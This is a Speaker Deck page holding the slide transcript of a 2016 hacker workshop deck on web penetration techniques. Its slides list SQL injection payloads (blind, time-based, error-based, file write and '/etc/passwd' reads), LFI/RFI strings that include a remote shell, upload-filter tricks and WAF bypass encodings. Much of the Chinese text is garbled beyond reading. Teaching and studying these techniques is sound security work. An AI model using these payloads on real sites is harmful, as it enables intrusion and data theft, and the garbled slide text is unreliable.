Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web滲透技巧(下)

Lionbug
October 01, 2016
Research
0
660

 Web滲透技巧(下)

The Declaration of Hacker (TDOH) WorkShop

Lionbug

October 01, 2016
Tweet

More Decks by Lionbug

See All by Lionbug
Privacy and Security
lionbug
0
210
Web滲透技巧(上)
lionbug
1
360

Other Decks in Research

See All in Research
VAR モデルによる OSS プロジェクト同士が生存性に与える 影響の分析
noppoman
0
140
東工大Swallowプロジェクトにおける大規模日本語Webコーパスの構築
aya_se
13
6.9k
ゼロからわかるリザバーコンピューティング
kurotaky
1
320
Deep State Space Models 101 / Mamba
kurita
9
3.6k
[Human-AI Decision Making勉強会] 説明の更新はユーザにどのような影響をもたらすか
okoso
1
210
クロスモーダル表現学習の研究動向: 音声関連を中心として
ryomasumura
3
620
第12回全日本コンピュータビジョン勉強会:画像の自己教師あり学習における大規模データセット
naok615
0
530
Accurate Method and Variable Tracking in Commit History
tsantalis
0
280
10-ot-generic-bio.pdf
gpeyre
0
140
オープンな日本語埋め込みモデルの選択肢 / Exploring Publicly Available Japanese Embedding Models
nttcom
14
5.8k
言語間転移学習で大規模言語モデルを賢くする
ikuyamada
8
3.6k
Julia Tokyo #11 トーク: 「Juliaで歩く自動微分」
abap34
2
1.3k

Featured

See All Featured
Learning to Love Humans: Emotional Interface Design
aarron
267
39k
Making Projects Easy
brettharned
109
5.5k
No one is an island. Learnings from fostering a developers community.
thoeni
16
2.1k
Building Adaptive Systems
keathley
32
1.9k
Keith and Marios Guide to Fast Websites
keithpitt
408
22k
Save Time (by Creating Custom Rails Generators)
garrettdimon
PRO
0
35
KATA
mclloyd
16
12k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
22
1.4k
Creatively Recalculating Your Daily Design Routine
revolveconf
211
11k
Embracing the Ebb and Flow
colly
80
4.2k
We Have a Design System, Now What?
morganepeng
43
6.8k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
22
1.6k

Transcript

  1. Web佒蝚ದૣ(Ӥ) ӥ 2016/10/01 @ TDOH WorkShop LionBug

  2. About Me • 讙紣Ռ̴a.k.a̴LionBug • ಑褾ੜ୞ of TDOH • Co-founder

    of UCCU • Know a little • Web Security

  3. 蝱褩笙၏ڥአ

  4. SQL Injection

  5. SQL Injection 脒慁ৼ • Union Based • Error Based •

    Blind Based
 • Time Based

  6. SQL Injection ဳ獈֖ᗝ • WHERE id = 1 • WHERE

    id = ‘1’ • WHERE id = “1”

  7. ڣ䥁虻碘䓚ੜದૣ • MySQL物version() • MSSQL物@@version • Oracle物v$version (Table) • SQLite物sqlite_version()

  8. ଉአ޸犤 • MySQL物version()牏user()牏database() • SQLite物sqlite_version() • MSSQL物@@version牏user牏db_name()

  9. UNION Based • UNION 瞲犤ጱፓጱฎ疥獋㮆 SQL 承 ݙጱ奾ຎݳ㬫蚏㬵牐 • 䳱֖碍ᥝፘݶ

    • union select 1, 2 ,3

  10. ੜದૣ • order by 1 • order by 100 •

  11. ဳ఺Ԫ殻 • MySQL牏SQLite ᛔ㵕旉矦ࣳ眲 • MSSQL牏Orcale ࣳ眲஠殾ፘݶ • …

  12. Blind Based • 蝚螂 True ౲ False 叨ኞጱ犋ݶ奾ຎ㬵 ڣ䥁 •

    and 1=1 • and 1=0

  13. Blind Based • SELECT * FROM news WHERE id =

    1 and 
 (SELECT length(username) FROM member
 LIMIT 1)=1 • SELECT * FROM news WHERE id = 1 and 
 (SELECT length(username) FROM member
 LIMIT 1)=2

  14. Blind Based •SELECT * FROM news WHERE id = 1

    and 
 (SELECT substr(username,1,1) FROM member
 LIMIT 1)=‘a’ •SELECT * FROM news WHERE id = 1 and 
 (SELECT substr(username,1,1) FROM member
 LIMIT 1)=‘b’

  15. Time Based • 蝚螂ࢧ䛑碻樌ڣ䥁 • sleep • IF(MID(user(),1,1) = 'r',

    SLEEP(5), 0) • Heavy • BENCHMARK(100000000, rand())

  16. Error Based • 蝚螂梊藮懱௳玲஑虻碘 • ExtractValue(1,concat(0x7e,version())) • XPATH syntax error:

    ‘~5.5'

  17. SQL Injection 磧य़玕 • INTO OUTFIEL ‘/var/www/shell.php’ • LOAD_FILE(‘/etc/passwd’)

  18. PHP SQL Injection ڥአ • ଉአ螂筪獢碍 • addslashes() • mysql_escape_string()

    • mysql_real_escape_string() • magic_quotes_gpc = On • php4, php<5.2.1 磪犚㺔氂

  19. 獢碍穉斃

  20. PHP SQL Injection ڥአ • Select user From member Where

    id = 123 • 1 or 1=1 %23

  21. 䋿ֺ

  22. PHP SQL Injection ڥአ • 裾ଶ౼䥁 • ᩻螂10֖ز౼䥁 • adminxxxx’

    => adminxxxx\’
 => adminxxxx\ • where username = ‘adminxxxx\’

  23. 䲆ݷ褖ګӤ㯽

  24. 媅螂篷ဩӤ㯽.PHP • .php3 .php4 .phtml • nginx ޾ iis 蟴ᗝ梊藮

    • http://lionbug.tw/123.jpg/1.php • .htaccess

  25. Local File Inclusion ڥአ磧य़玕

  26. Local File Inclusion • include($_GET[‘file’]); • RCE • ?file=php://input •

    ?file=expect://ls • RFI • ?file=http://lionbug.tw/shell.txt

  27. Local File Inclusion • include($_GET[‘file’].’php’); • RCE • ?file=\\192.168.100.1\1.php •

    RFI • ?file=http://lionbug.tw/shell.php

  28. LFI + Upload 奲ݳದ

  29. LFI + Upload • 䲆礯犋胼ᤩ旉矦 • include.php?file=upload/123.jpg • include.php?file=../../upload/123.jpg

  30. LFI + PHPINFO 奲ݳದ

  31. LFI + PHPINFO • php upload 秚ګ • [tmp_name] =>

    /tmp/phpGvjUMn • ?file=/tmp/phpGvjUMn • 皤螛㳫ᴻ碻樌

  32. PHPINFO

  33. App ሴێਡ - ݚӞ㮆ॠ璤

  34. App 蝖ݻ • beta.lionbug.tw • 梊藮debug๚橕樂 • Facebook้粁螂᯿ᗝPINูێᏈ薹 • 战ग़WEB笙၏ๅ਻ฃڊ匍

    • 褲萢API

  35. App 蝖ݻ • ّ਻膑粚๜ • /v2/login • /v1/login <- 盛懿狒虁

    • …

  36. WAF web application firewall

  37. CloudFlare

  38. 360

  39. ਞ獊ᇸ

  40. ඊ℃

  41. WAF • DNS WAF(CloudFlare) • 戔猋ጱWAF • 敟誢ጱWAF(ਞ獊ᇸ, 360 …)

    • …

  42. 篷脲䲒介य़ဩ • 篷ࢧ䛑 • 䲒介ک硭䢗 • ᤩ旉᪡ • …

  43. Bypass WAF 媅Ջ讕媅ፗ矑಑Ԇ秚

  44. ᪡螂 DNS WAF • IP • Google • DNS history

    • 虻懱丽笙 • ูێဩ • 综膐IP • DDoS

  45. ᪡螂 DNS WAF • 獉翕硭䢗 • 礍戔๐率ࣁ獉蟂 • ڥአ笙၏ •

    SSRF(Server-side Request Forgery) • …

  46. ඊ℃

  47. Bypass WAF 蝢አ • TCP 瞥۱ • 咳᩻य़۱ • 1

    and 111…111 • ዁୵㶧捍 • य़ੜ䌃磦矦 • SeLECt 1 FroM …

  48. Bypass WAF 蝢አ • 㷢碍࿱礕 • PHP/Apache, par1=var2 • a=1&a=1

    or 1 • JSP/Tomcat, par1=var1 • ASP/IIS, par1=var1,var2 • a=1’&a=or 1—

  49. Bypass WAF 蝢አ • 承᥺粬௔ • Null Byte • a=%00’

    or ‘1 • ྋ憒蔭螈ୗ㻌ᤈ玚蟴 • /r /n • a=%0a’ or ‘1

  50. Bypass WAF 蝢አ • 翥嘨媅螂 • Urlencode • Unicode •

    Ӿ෈翥嘨

  51. Ӿ෈ਁ媅螂 Web Hacking Ӿጱ॰ದ窸ૣ Orange http://hitcon.org/2015/CMT/download/day1-c-r0.pdf

  52. MySQL Bypass WAF

  53. MySQL Bypass WAF • 绚ጮ磦矦 • select%0auser%0dfrom%09member • select(user)from(member) •

    select+user+from+member

  54. MySQL Bypass WAF • 戢薹 • select/**/user/**/from/**/member • /*!5000select 1*/

    • admin where id=1`xxxx

  55. MySQL Bypass WAF • 磦矦 • CONCAT -> CONCAT_WS •

    ‘/etc/passwd' ->
 0x2f6574632f706173737764 • 1=1 -> 1>0 • 1=1 -> 1

  56. Upload Bypass WAF

  57. 㷢碍࿱礕(1)

  58. 㷢碍࿱礕(2)

  59. ዁୵㶧捍(1)

  60. Upload Bypass WAF • ዁୵㶧捍(2) • filename=123.php • filename=‘123.php’ •

    filename=“123.jpg • 犋ݶContent-Type • application/x-www-form-urlencoded • multipart/form-data

  61. Upload Bypass WAF • ीے篷఺嬝獉਻ • a=य़䲆礯, file=123.php

  62. Other Bypass WAF

  63. Other Bypass WAF • LFI • ../../ • .//../././../

  64. 篷አੜದ胼 • User-Agent: sqlmap • ֦䨝咳匍盄ग़翕ᒊӤ犋݄ XDD

  65. Q & A